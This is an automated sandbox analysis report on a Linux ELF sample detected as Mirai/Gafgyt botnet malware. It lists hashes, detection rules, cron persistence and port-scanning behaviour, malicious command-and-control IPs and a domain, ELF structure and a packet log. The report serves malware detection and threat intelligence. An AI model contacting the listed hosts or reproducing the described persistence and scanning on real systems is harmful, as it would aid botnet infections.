Edit tour
Linux
Analysis Report
x86.elf
Overview
General Information
Sample name: | x86.elf |
Analysis ID: | 1543082 |
MD5: | bb9275394716c60d1941432c7085ca13 |
SHA1: | 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc |
SHA256: | 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615 |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Mirai
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Machine Learning detection for sample
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1543082 |
Start date and time: | 2024-10-27 08:07:08 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 36s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | x86.elf |
Detection: | MAL |
Classification: | mal88.troj.linELF@0/1@22/0 |
Command: | /tmp/x86.elf |
PID: | 6257 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | you are now apart of hail cock botnet |
Standard Error: | no crontab for root |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Mirai | Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. | No Attribution |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
Linux_Trojan_Gafgyt_9e9530a7 | unknown | unknown |
| |
Linux_Trojan_Gafgyt_807911a2 | unknown | unknown |
| |
Linux_Trojan_Gafgyt_d4227dbf | unknown | unknown |
| |
Click to see the 6 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
Linux_Trojan_Gafgyt_9e9530a7 | unknown | unknown |
| |
Linux_Trojan_Gafgyt_807911a2 | unknown | unknown |
| |
Linux_Trojan_Gafgyt_d4227dbf | unknown | unknown |
| |
Click to see the 7 entries |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: |
Source: | String: |
Networking |
---|
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior |
Source: | Stderr: no crontab for root: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | Direct Volume Access | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Scripting | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction |
⊘No configs have been found
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
50% | ReversingLabs | Linux.Backdoor.Gafgyt | ||
48% | Virustotal | Browse | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
16% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kingstonwikkerink.dyn | 88.151.195.22 | true | true | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
194.87.198.29 | unknown | Russian Federation | 49352 | LOGOL-ASRU | true | |
193.233.193.45 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.149.218.232 | unknown | Poland | 198401 | GECKONET-ASPL | false | |
31.13.248.89 | unknown | Bulgaria | 34224 | NETERRA-ASBG | true | |
88.151.195.22 | kingstonwikkerink.dyn | Azerbaijan | 15723 | AZERONLINEAZ | true | |
91.149.238.18 | unknown | Poland | 41952 | MARTON-ASPL | false | |
81.29.149.178 | unknown | Switzerland | 39616 | COMUNICA_IT_SERVICESCH | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
194.87.198.29 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
193.233.193.45 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
109.202.202.202 | Get hash | malicious | Unknown | Browse |
| |
91.149.218.232 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
kingstonwikkerink.dyn | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
INIT7CH | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | BlackBasta | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
GECKONET-ASPL | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
FREE-NET-ASFREEnetEU | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
LOGOL-ASRU | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
⊘No context
⊘No context
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 306 |
Entropy (8bit): | 5.16446106603911 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQ3pXEqQDUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jnd/:8QjHig83QgeHLUHYC+GABjnOGAFkz |
MD5: | 990AA70CE431A26BA6D8E34357103C54 |
SHA1: | 668086CE084D63B2522B0F6C3069ED2B11467B6B |
SHA-256: | E7EEDA57727B39509632B5DC6C325737375EF0ED223ADA594F6CB579609270CD |
SHA-512: | 6079A750C67453EA7405C514AF22D783C7FF9D3DCAB7A664C2AC6553D1C392AC4013179B9E3B7D94BECEC5FAD5D7D777E0330ED460335B92EB8C312B07E1EF12 |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.266916675051606 |
TrID: |
|
File name: | x86.elf |
File size: | 95'576 bytes |
MD5: | bb9275394716c60d1941432c7085ca13 |
SHA1: | 43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc |
SHA256: | 3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615 |
SHA512: | 047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d |
SSDEEP: | 1536:lDVOLhrwmN92XVNbMxvk2bB3n2GNR9maOY7h8RGEhXXBP:9VO9v4vbMxvkEB3VNR9u4h8RGaxP |
TLSH: | 51932A037642C9FFC05BC1B417AB6936CD22FC7E0A36719567D0FEA16A09DE16E2D620 |
File Content Preview: | .ELF..............>.......@.....@........r..........@.8...@.......................@.......@......U.......U.......................`.......`Q......`Q.....P........o..............Q.td....................................................H...._....z/..H........ |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 64 |
Program Header Offset: | 64 |
Program Header Size: | 56 |
Number of Program Headers: | 3 |
Section Header Offset: | 94744 |
Section Header Size: | 64 |
Number of Section Headers: | 13 |
Header String Table Index: | 12 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x4000e8 | 0xe8 | 0x13 | 0x0 | 0x6 | AX | 0 | 0 | 1 |
.text | PROGBITS | 0x400100 | 0x100 | 0x12fa8 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x4130a8 | 0x130a8 | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 1 |
.rodata | PROGBITS | 0x4130c0 | 0x130c0 | 0x24e0 | 0x0 | 0x2 | A | 0 | 0 | 32 |
.eh_frame | PROGBITS | 0x4155a0 | 0x155a0 | 0x4 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ctors | PROGBITS | 0x516000 | 0x16000 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
.dtors | PROGBITS | 0x516010 | 0x16010 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
.jcr | PROGBITS | 0x516020 | 0x16020 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
.data | PROGBITS | 0x516040 | 0x16040 | 0x510 | 0x0 | 0x3 | WA | 0 | 0 | 32 |
.bss | NOBITS | 0x516560 | 0x16550 | 0x6a68 | 0x0 | 0x3 | WA | 0 | 0 | 32 |
.comment | PROGBITS | 0x0 | 0x16550 | 0xc72 | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x171c2 | 0x56 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x400000 | 0x400000 | 0x155a4 | 0x155a4 | 6.4023 | 0x5 | R E | 0x100000 | .init .text .fini .rodata .eh_frame | |
LOAD | 0x16000 | 0x516000 | 0x516000 | 0x550 | 0x6fc8 | 2.6917 | 0x6 | RW | 0x100000 | .ctors .dtors .jcr .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 27, 2024 08:07:57.595434904 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Oct 27, 2024 08:07:58.139594078 CET | 55368 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:07:58.145152092 CET | 8507 | 55368 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:07:58.145210028 CET | 55368 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:07:58.145231009 CET | 55368 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:07:58.150640965 CET | 8507 | 55368 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:07:58.150693893 CET | 55368 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:07:58.158782959 CET | 8507 | 55368 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:07:59.227757931 CET | 8507 | 55368 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:07:59.227811098 CET | 8507 | 55368 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:07:59.227840900 CET | 8507 | 55368 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:07:59.227894068 CET | 55368 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:07:59.227894068 CET | 55368 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:07:59.227894068 CET | 55368 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:07:59.227936983 CET | 55368 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:08:03.226921082 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Oct 27, 2024 08:08:03.994611025 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Oct 27, 2024 08:08:17.560805082 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Oct 27, 2024 08:08:24.253628969 CET | 55370 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:08:24.259187937 CET | 8507 | 55370 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:08:24.259275913 CET | 55370 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:08:24.259275913 CET | 55370 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:08:24.264797926 CET | 8507 | 55370 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:08:24.264853001 CET | 55370 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:08:24.270267963 CET | 8507 | 55370 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:08:25.237713099 CET | 8507 | 55370 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:08:25.237762928 CET | 8507 | 55370 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:08:25.237802029 CET | 55370 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:08:25.237802029 CET | 55370 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:08:25.237869024 CET | 55370 | 8507 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:08:29.847151995 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Oct 27, 2024 08:08:33.942543030 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Oct 27, 2024 08:08:45.285717010 CET | 40530 | 4226 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:08:45.291575909 CET | 4226 | 40530 | 91.149.238.18 | 192.168.2.23 |
Oct 27, 2024 08:08:45.291786909 CET | 40530 | 4226 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:08:45.291788101 CET | 40530 | 4226 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:08:45.297483921 CET | 4226 | 40530 | 91.149.238.18 | 192.168.2.23 |
Oct 27, 2024 08:08:45.297693968 CET | 40530 | 4226 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:08:45.303210020 CET | 4226 | 40530 | 91.149.238.18 | 192.168.2.23 |
Oct 27, 2024 08:08:46.127919912 CET | 4226 | 40530 | 91.149.238.18 | 192.168.2.23 |
Oct 27, 2024 08:08:46.128343105 CET | 40530 | 4226 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:08:46.128438950 CET | 40530 | 4226 | 192.168.2.23 | 91.149.238.18 |
Oct 27, 2024 08:08:51.143845081 CET | 35130 | 11060 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:08:51.149352074 CET | 11060 | 35130 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:08:51.149421930 CET | 35130 | 11060 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:08:51.149440050 CET | 35130 | 11060 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:08:51.155421972 CET | 11060 | 35130 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:08:51.155489922 CET | 35130 | 11060 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:08:51.161094904 CET | 11060 | 35130 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:08:52.421345949 CET | 11060 | 35130 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:08:52.421389103 CET | 11060 | 35130 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:08:52.421469927 CET | 35130 | 11060 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:08:52.421469927 CET | 35130 | 11060 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:08:52.421521902 CET | 35130 | 11060 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:08:57.526181936 CET | 47208 | 7680 | 192.168.2.23 | 81.29.149.178 |
Oct 27, 2024 08:08:57.532020092 CET | 7680 | 47208 | 81.29.149.178 | 192.168.2.23 |
Oct 27, 2024 08:08:57.532242060 CET | 47208 | 7680 | 192.168.2.23 | 81.29.149.178 |
Oct 27, 2024 08:08:57.532242060 CET | 47208 | 7680 | 192.168.2.23 | 81.29.149.178 |
Oct 27, 2024 08:08:57.537844896 CET | 7680 | 47208 | 81.29.149.178 | 192.168.2.23 |
Oct 27, 2024 08:08:57.538067102 CET | 47208 | 7680 | 192.168.2.23 | 81.29.149.178 |
Oct 27, 2024 08:08:57.543900013 CET | 7680 | 47208 | 81.29.149.178 | 192.168.2.23 |
Oct 27, 2024 08:08:58.414297104 CET | 7680 | 47208 | 81.29.149.178 | 192.168.2.23 |
Oct 27, 2024 08:08:58.414635897 CET | 47208 | 7680 | 192.168.2.23 | 81.29.149.178 |
Oct 27, 2024 08:08:58.414635897 CET | 47208 | 7680 | 192.168.2.23 | 81.29.149.178 |
Oct 27, 2024 08:08:58.515172958 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Oct 27, 2024 08:09:03.446145058 CET | 33284 | 4069 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:09:03.451886892 CET | 4069 | 33284 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:09:03.451986074 CET | 33284 | 4069 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:09:03.452042103 CET | 33284 | 4069 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:09:03.457710981 CET | 4069 | 33284 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:09:03.457789898 CET | 33284 | 4069 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:09:03.463401079 CET | 4069 | 33284 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:09:04.396224022 CET | 4069 | 33284 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:09:04.396374941 CET | 33284 | 4069 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:09:04.396445990 CET | 33284 | 4069 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:09:04.396538019 CET | 4069 | 33284 | 31.13.248.89 | 192.168.2.23 |
Oct 27, 2024 08:09:04.396631956 CET | 33284 | 4069 | 192.168.2.23 | 31.13.248.89 |
Oct 27, 2024 08:09:09.495258093 CET | 60534 | 13106 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:09.500966072 CET | 13106 | 60534 | 88.151.195.22 | 192.168.2.23 |
Oct 27, 2024 08:09:09.501060009 CET | 60534 | 13106 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:09.501101017 CET | 60534 | 13106 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:09.506788969 CET | 13106 | 60534 | 88.151.195.22 | 192.168.2.23 |
Oct 27, 2024 08:09:09.506889105 CET | 60534 | 13106 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:09.512778997 CET | 13106 | 60534 | 88.151.195.22 | 192.168.2.23 |
Oct 27, 2024 08:09:10.463850975 CET | 13106 | 60534 | 88.151.195.22 | 192.168.2.23 |
Oct 27, 2024 08:09:10.463876963 CET | 13106 | 60534 | 88.151.195.22 | 192.168.2.23 |
Oct 27, 2024 08:09:10.464011908 CET | 60534 | 13106 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:10.464013100 CET | 60534 | 13106 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:10.464147091 CET | 60534 | 13106 | 192.168.2.23 | 88.151.195.22 |
Oct 27, 2024 08:09:25.548032999 CET | 42144 | 13644 | 192.168.2.23 | 91.149.218.232 |
Oct 27, 2024 08:09:25.554003000 CET | 13644 | 42144 | 91.149.218.232 | 192.168.2.23 |
Oct 27, 2024 08:09:25.554223061 CET | 42144 | 13644 | 192.168.2.23 | 91.149.218.232 |
Oct 27, 2024 08:09:25.554223061 CET | 42144 | 13644 | 192.168.2.23 | 91.149.218.232 |
Oct 27, 2024 08:09:25.560199976 CET | 13644 | 42144 | 91.149.218.232 | 192.168.2.23 |
Oct 27, 2024 08:09:25.560451984 CET | 42144 | 13644 | 192.168.2.23 | 91.149.218.232 |
Oct 27, 2024 08:09:25.566430092 CET | 13644 | 42144 | 91.149.218.232 | 192.168.2.23 |
Oct 27, 2024 08:09:26.615081072 CET | 13644 | 42144 | 91.149.218.232 | 192.168.2.23 |
Oct 27, 2024 08:09:26.615283012 CET | 13644 | 42144 | 91.149.218.232 | 192.168.2.23 |
Oct 27, 2024 08:09:26.615292072 CET | 42144 | 13644 | 192.168.2.23 | 91.149.218.232 |
Oct 27, 2024 08:09:26.615292072 CET | 42144 | 13644 | 192.168.2.23 | 91.149.218.232 |
Oct 27, 2024 08:09:26.615457058 CET | 42144 | 13644 | 192.168.2.23 | 91.149.218.232 |
Oct 27, 2024 08:09:31.636189938 CET | 54264 | 15763 | 192.168.2.23 | 194.87.198.29 |
Oct 27, 2024 08:09:31.642128944 CET | 15763 | 54264 | 194.87.198.29 | 192.168.2.23 |
Oct 27, 2024 08:09:31.642358065 CET | 54264 | 15763 | 192.168.2.23 | 194.87.198.29 |
